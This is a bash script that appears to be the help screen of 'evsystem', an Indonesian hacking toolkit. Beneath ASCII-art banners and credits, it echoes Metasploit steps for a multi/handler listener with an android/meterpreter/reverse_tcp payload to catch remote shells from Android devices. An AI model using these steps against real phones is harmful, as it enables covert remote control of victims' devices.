#!/bin/bash


#WARNA KESUKAAN

cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[0;33m'
BlueF='\e[1;34m' #Biru
RESET="\033[00m" #normal
orange='\e[38;5;166m'
#WARNING !!!
resize -s 70 90 > /dev/null
clear
echo -e $red""
echo "             80G08        "
echo "                8G#G@8  "
echo "                  8##0  "
echo "                   0##G8    "
echo "                     ####08 "
echo "                      8#####8   "
echo "                        G#####8   "
echo "                         8G#####8   "
echo "      #8#########0         #######8   "
echo "          8#######0          0#88#####    "
echo "            8G####8         8 8#8@@8###   "
echo "               8###        G8   8@G######   "
echo "                8##88       8     8######8    "
echo "                  G##088          80G##G080   "
echo "                    88000000008880#      000    "
echo "                          9                 0 "
echo " "
echo "   __________________________________________________________"
echo "  |000000000000000000000000000000000000000 _00000000000000000"
echo "  |00000000000000000____   _____ _   _ ___| |_ ___ _ __ ___00"
echo "  |000000000000000/ _ \ \ / / __| | | / __| __/ _ \ '_   _ \ "
echo -e $white        " |000000000000  |  __/\ V /\__ \ |_| \__ \ ||  __/ | | | | |"
echo "  |000000000000000\___|0\_/ |___/\__  |___/\__\___|_| |_| |_|"
echo "  |000000000000000000000000000000|___/00000000000000000000000"
echo "  |0000000000000000000000000000000000000000000000000000000000"
echo "  "
echo -e $lightgreen
echo " ----[C] 2017 |ParrotSec |Dracos |Hacker Indonesia |Lubuk Alung |"
echo ""
echo -e $red
echo -n "tekan ENTER untuk melanjutkan .............."
read warning
echo -e $lightgreen
echo "              ____________________________________ "
echo "[==========> |created by:Eko Saputra (evsystem)   |"
echo "[==========> |Version:1.1.0                       |"
echo "[==========> |follow me on Github: @ekovegeance   |"
echo "             |twitter: @ekovegeance7              |"
echo "             |____________________________________|"
echo -e $cyan
echo "                        "
echo "                        "
echo "                        "
echo "run msfconsole                       "
echo "   |                     "
echo "   |                     "
echo "   |-----------> use exploit/multi/handler "
echo "         |               "
echo "         |               "
echo "         |-----------> set payload android/meterpreter/reverse_tcp "
echo "                |        "
echo "                |        "
echo "                |= set lhost 192.168.0.2 (ip anda)"
echo "                |=set lport 4444 (default)  "
echo "                  |      "
echo "                  |[ exploit ] "

echo -e $red
echo -n -e "  Do you want exit? ( Y (ya) / N (tidak) ) :"
      read back
      if [ $back != 'n' ] && [ $back != 'N' ]
          then
          clear
          exit
      elif [ $back != 'y' ] && [ $back != 'Y' ]
          then
          menu

fi
